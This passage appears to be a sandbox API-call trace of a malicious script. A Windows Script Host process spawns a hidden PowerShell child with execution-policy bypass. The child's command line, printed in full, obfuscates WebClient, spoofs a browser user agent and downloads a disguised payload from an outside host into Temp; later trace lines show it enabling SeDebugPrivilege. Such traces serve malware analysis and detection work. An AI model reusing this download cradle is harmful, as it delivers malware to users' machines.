	[0054.300] FormatMessageW (in: dwFlags=0x500, lpSource=0x38e5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x24c120, nSize=0x0, Arguments=0x24c190 | out: lpBuffer="\xb4b0\x3d") returned 0x31
	[0054.300] CErrorObject::SetDescription () returned 0x0
	[0054.300] CErrorObject::SetHelpFile () returned 0x0
	[0054.300] CErrorObject::SetHelpContext () returned 0x0
	[0054.300] QueryInterface () returned 0x0
	[0054.300] SetErrorInfo (dwReserved=0x0, perrinfo=0x38a710) returned 0x0
	[0054.300] Release () returned 0x2
	[0054.300] IUnknown:Release (This=0x38a710) returned 0x1
	[0054.300] LocalFree (hMem=0x3db4b0) returned 0x0
	[0054.301] IUnknown:Release (This=0x3da220) returned 0x1
	[0054.301] CLSIDFromProgIDEx (in: lpszProgID="shell.applicatiOn", lpclsid=0x24b2e0 | out: lpclsid=0x24b2e0*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0054.304] SysStringLen (param_1=0x0) returned 0x0
	[0054.304] CoGetClassObject (in: rclsid=0x24b2e0*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fee3286300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24b2b0 | out: ppv=0x24b2b0*=0x7fefdfd8d20) returned 0x0
	[0054.306] Shell:IUnknown:QueryInterface (in: This=0x7fefdfd8d20, riid=0x7fee3286310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x24b2b8 | out: ppvObject=0x24b2b8*=0x0) returned 0x80004002
	[0054.306] Shell:IClassFactory:CreateInstance (in: This=0x7fefdfd8d20, pUnkOuter=0x0, riid=0x7fee3286350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24b2a0 | out: ppvObject=0x24b2a0*=0x38a710) returned 0x0
	[0054.306] Shell:IUnknown:Release (This=0x7fefdfd8d20) returned 0x1
	[0054.306] Shell:IUnknown:QueryInterface (in: This=0x38a710, riid=0x7fee3286320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x24b280 | out: ppvObject=0x24b280*=0x38a750) returned 0x0
	[0054.306] ??2@YAPEAX_K@Z () returned 0x4d9020
	[0054.306] Shell:IObjectWithSite:SetSite (This=0x38a750, pUnkSite=0x4d9020) returned 0x0
	[0054.306] Shell:IUnknown:AddRef (This=0x4d9020) returned 0x2
	[0054.306] Shell:IUnknown:Release (This=0x38a750) returned 0x1
	[0054.307] Shell:IUnknown:QueryInterface (in: This=0x38a710, riid=0x7fee3286370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x24b258 | out: ppvObject=0x24b258*=0x0) returned 0x80004002
	[0054.307] Shell:IUnknown:QueryInterface (in: This=0x38a710, riid=0x7fee3286518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x24b1d0 | out: ppvObject=0x24b1d0*=0x0) returned 0x80004002
	[0054.307] Shell:IUnknown:QueryInterface (in: This=0x38a710, riid=0x7fee32864f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x24b1d8 | out: ppvObject=0x24b1d8*=0x0) returned 0x80004002
	[0054.307] Shell:IUnknown:QueryInterface (in: This=0x38a710, riid=0x7fee3286508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x24b1e0 | out: ppvObject=0x24b1e0*=0x0) returned 0x80004002
	[0054.307] Shell:IUnknown:QueryInterface (in: This=0x38a710, riid=0x7fee3286340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24b1e8 | out: ppvObject=0x24b1e8*=0x38a710) returned 0x0
	[0054.307] GetTickCount () returned 0x1e761
	[0054.307] Shell:IUnknown:Release (This=0x38a710) returned 0x1
	[0054.307] realloc (_Block=0x492b40, _Size=0x140) returned 0x451f40
	[0054.309] MulDiv (nNumber=958, nNumerator=100, nDenominator=3511) returned 27
	[0054.309] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.309] GetTickCount () returned 0x1e761
	[0054.310] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0054.310] IUnknown:Release (This=0x35f420) returned 0x1
	[0054.311] GetTickCount () returned 0x1e771
	[0054.313] FindResourceA (hModule=0x7fee31e0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0054.313] LoadResource (hModule=0x7fee31e0000, hResInfo=0x120718) returned 0x120b6c
	[0054.313] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0054.313] SizeofResource (hModule=0x7fee31e0000, hResInfo=0x120718) returned 0x86
	[0054.314] FreeResource (hResData=0x120b6c) returned 0
	[0054.314] FindResourceA (hModule=0x7fee31e0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0054.314] LoadResource (hModule=0x7fee31e0000, hResInfo=0x1207e8) returned 0x121c74
	[0054.314] LockResource (hResData=0x121c74) returned 0x121c74
	[0054.314] SizeofResource (hModule=0x7fee31e0000, hResInfo=0x1207e8) returned 0xce
	[0054.314] FreeResource (hResData=0x121c74) returned 0
	[0054.314] bsearch (_Key=0x163438, _Base=0x7fee32aa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee32381a0) returned 0x7fee32aa410
	[0054.569] SendMessageA (hWnd=0x3021a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0054.571] SendMessageA (hWnd=0x3021a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0054.571] PostMessageA (hWnd=0x3021a, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0054.572] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x24fab0*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0054.573] CloseHandle (hObject=0xd4) returned 1
	[0054.573] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.573] IUnknown:Release (This=0x36e5f0) returned 0x0
	[0054.573] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.573] IUnknown:Release (This=0x36e6a0) returned 0x0
	[0054.573] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.573] IUnknown:Release (This=0x36e750) returned 0x0
	[0054.573] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.573] IUnknown:Release (This=0x36e540) returned 0x0
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] GetProcessHeap () returned 0x340000
	[0054.574] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3aae20 | out: hHeap=0x340000) returned 1
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x24fae0 | out: lplpMessageFilter=0x24fae0*=0x315f80) returned 0x0
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] ??3@YAXPEAX@Z () returned 0x15720801
	[0054.574] CoUninitialize () 
	[0054.575] DllCanUnloadNow () returned 0x0
	[0054.575] DllCanUnloadNow () 

Thread:
	id = 55
	os_tid = 0x8f4


Thread:
	id = 58
	os_tid = 0x8d4

	[0052.313] GetClassInfoA (in: hInstance=0xff8d0000, lpClassName="WSH-Timer", lpWndClass=0x284fd50 | out: lpWndClass=0x284fd50) returned 0
	[0052.313] RegisterClassA (lpWndClass=0x284fd50) returned 0x9006ac19c
	[0052.313] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff8d0000, lpParam=0x315a60) returned 0x3021a
	[0052.314] GetWindowLongPtrA (hWnd=0x3021a, nIndex=-21) returned 0x0
	[0052.314] NtdllDefWindowProc_A (hWnd=0x3021a, Msg=0x24, wParam=0x0, lParam=0x284f740) returned 0x0
	[0052.314] GetWindowLongPtrA (hWnd=0x3021a, nIndex=-21) returned 0x0
	[0052.314] SetWindowLongPtrA (hWnd=0x3021a, nIndex=-21, dwNewLong=0x315a60) returned 0x0
	[0052.314] NtdllDefWindowProc_A (hWnd=0x3021a, Msg=0x81, wParam=0x0, lParam=0x284f700) returned 0x1
	[0052.316] GetWindowLongPtrA (hWnd=0x3021a, nIndex=-21) returned 0x315a60
	[0052.316] NtdllDefWindowProc_A (hWnd=0x3021a, Msg=0x83, wParam=0x0, lParam=0x284f760) returned 0x0
	[0052.318] GetWindowLongPtrA (hWnd=0x3021a, nIndex=-21) returned 0x315a60
	[0052.318] NtdllDefWindowProc_A (hWnd=0x3021a, Msg=0x1, wParam=0x0, lParam=0x284f700) returned 0x0
	[0052.319] SetEvent (hEvent=0xcc) returned 1
	[0052.352] GetMessageA (in: lpMsg=0x284fd20, hWnd=0x3021a, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x284fd20) returned 0
	[0054.569] GetWindowLongPtrA (hWnd=0x3021a, nIndex=-21) returned 0x315a60
	[0054.571] GetWindowLongPtrA (hWnd=0x3021a, nIndex=-21) returned 0x315a60

Thread:
	id = 61
	os_tid = 0x8e0


Thread:
	id = 62
	os_tid = 0x154


Thread:
	id = 63
	os_tid = 0x8f8


Thread:
	id = 66
	os_tid = 0x908


Thread:
	id = 67
	os_tid = 0x7d8


Thread:
	id = 94
	os_tid = 0x81c


Thread:
	id = 95
	os_tid = 0x820


Process:
	id = "7"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1faeb000"
	os_pid = "0x8b8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "5"
	os_parent_pid = "0x848"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 52
	os_tid = 0x8b4

	[0061.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0062.730] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.730] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.730] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0062.730] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0064.634] GetVersionExW (in: lpVersionInformation=0x27db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27db20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.636] GetVersionExW (in: lpVersionInformation=0x27db20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27db20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.719] GetVersionExW (in: lpVersionInformation=0x27d890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27d890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.720] SetErrorMode (uMode=0x1) returned 0x1
	[0064.721] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x27d9f0 | out: lpFileInformation=0x27d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0064.722] SetErrorMode (uMode=0x1) returned 0x1
	[0064.750] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x27dc60 | out: lpdwHandle=0x27dc60) returned 0x94c
	[0064.753] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cb7370 | out: lpData=0x2cb7370) returned 1
	[0064.756] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27dbd8, puLen=0x27dbd0 | out: lplpBuffer=0x27dbd8*=0x2cb740c, puLen=0x27dbd0) returned 1
	[0064.758] lstrlenW (lpString="䅁") returned 1
	[0064.768] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb74e8, puLen=0x27db40) returned 1
	[0064.830] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0064.832] CoTaskMemAlloc (cb=0x2e) returned 0x551740
	[0064.832] lstrcpyW (in: lpString1=0x551740, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0064.833] CoTaskMemFree (pv=0x551740) 
	[0064.833] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb753c, puLen=0x27db40) returned 1
	[0064.833] lstrlenW (lpString="System.Management.Automation") returned 28
	[0064.833] CoTaskMemAlloc (cb=0x3c) returned 0x4fdc70
	[0064.833] lstrcpyW (in: lpString1=0x4fdc70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0064.833] CoTaskMemFree (pv=0x4fdc70) 
	[0064.833] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb7598, puLen=0x27db40) returned 1
	[0064.833] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.833] CoTaskMemAlloc (cb=0x20) returned 0x5578a0
	[0064.833] lstrcpyW (in: lpString1=0x5578a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.833] CoTaskMemFree (pv=0x5578a0) 
	[0064.833] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb75d8, puLen=0x27db40) returned 1
	[0064.833] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.833] CoTaskMemAlloc (cb=0x44) returned 0x4fdc70
	[0064.833] lstrcpyW (in: lpString1=0x4fdc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.833] CoTaskMemFree (pv=0x4fdc70) 
	[0064.833] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb7640, puLen=0x27db40) returned 1
	[0064.833] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0064.833] CoTaskMemAlloc (cb=0x76) returned 0x4edf00
	[0064.833] lstrcpyW (in: lpString1=0x4edf00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0064.833] CoTaskMemFree (pv=0x4edf00) 
	[0064.833] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb76dc, puLen=0x27db40) returned 1
	[0064.833] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.834] CoTaskMemAlloc (cb=0x44) returned 0x4fdc70
	[0064.834] lstrcpyW (in: lpString1=0x4fdc70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.834] CoTaskMemFree (pv=0x4fdc70) 
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb7740, puLen=0x27db40) returned 1
	[0064.834] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0064.834] CoTaskMemAlloc (cb=0x58) returned 0x4a4620
	[0064.834] lstrcpyW (in: lpString1=0x4a4620, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0064.834] CoTaskMemFree (pv=0x4a4620) 
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb77bc, puLen=0x27db40) returned 1
	[0064.834] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.834] CoTaskMemAlloc (cb=0x20) returned 0x5578a0
	[0064.834] lstrcpyW (in: lpString1=0x5578a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.834] CoTaskMemFree (pv=0x5578a0) 
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x2cb7464, puLen=0x27db40) returned 1
	[0064.834] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0064.834] CoTaskMemAlloc (cb=0x66) returned 0x5556d0
	[0064.834] lstrcpyW (in: lpString1=0x5556d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0064.834] CoTaskMemFree (pv=0x5556d0) 
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x0, puLen=0x27db40) returned 0
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x0, puLen=0x27db40) returned 0
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x27db48, puLen=0x27db40 | out: lplpBuffer=0x27db48*=0x0, puLen=0x27db40) returned 0
	[0064.834] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27db18, puLen=0x27db10 | out: lplpBuffer=0x27db18*=0x2cb740c, puLen=0x27db10) returned 1
	[0064.839] CoTaskMemAlloc (cb=0x204) returned 0x4e8bd0
	[0064.839] VerLanguageNameW (in: wLang=0x0, szLang=0x4e8bd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0064.840] CoTaskMemFree (pv=0x4e8bd0) 
	[0064.840] VerQueryValueW (in: pBlock=0x2cb7370, lpSubBlock="\\", lplpBuffer=0x27db68, puLen=0x27db60 | out: lplpBuffer=0x27db68*=0x2cb7398, puLen=0x27db60) returned 1
	[0064.873] GetCurrentProcessId () returned 0x8b8
	[0064.972] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x27ca90 | out: lpLuid=0x27ca90*(LowPart=0x14, HighPart=0)) returned 1
	[0064.975] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.976] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x27cab0 | out: TokenHandle=0x27cab0*=0x2f0) returned 1
	[0064.978] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2cbabe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0064.986] CloseHandle (hObject=0x2f0) returned 1
	[0065.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b8) returned 0x2f0
	[0065.044] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2cbac50, cb=0x200, lpcbNeeded=0x27dac8 | out: lphModule=0x2cbac50, lpcbNeeded=0x27dac8) returned 1
	[0065.052] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2cbaec0, cb=0x18 | out: lpmodinfo=0x2cbaec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0065.053] CoTaskMemAlloc (cb=0x804) returned 0x559c00
	[0065.053] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x559c00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0065.053] CoTaskMemFree (pv=0x559c00) 
	[0065.054] CoTaskMemAlloc (cb=0x804) returned 0x559c00
	[0065.054] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x559c00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0065.054] CoTaskMemFree (pv=0x559c00) 
	[0065.055] CloseHandle (hObject=0x2f0) returned 1
	[0065.120] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x8b8) returned 0x2f0
	[0065.148] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x27dbf8 | out: lpExitCode=0x27dbf8*=0x103) returned 1
	[0065.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cbb088, Length=0x20000, ResultLength=0x27dbc0 | out: SystemInformation=0x12cbb088, ResultLength=0x27dbc0*=0xf2b8) returned 0x0
	[0065.238] EnumWindows (lpEnumFunc=0x2c366ac, lParam=0x0) returned 1
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x334
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x324
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.239] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x4a0
	[0065.240] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x27d920 | out: lpdwProcessId=0x27d920) returned 0x45c
